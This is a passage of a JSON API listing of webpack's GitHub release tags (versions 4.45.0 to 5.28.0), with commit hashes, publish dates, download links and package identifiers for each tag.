:null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5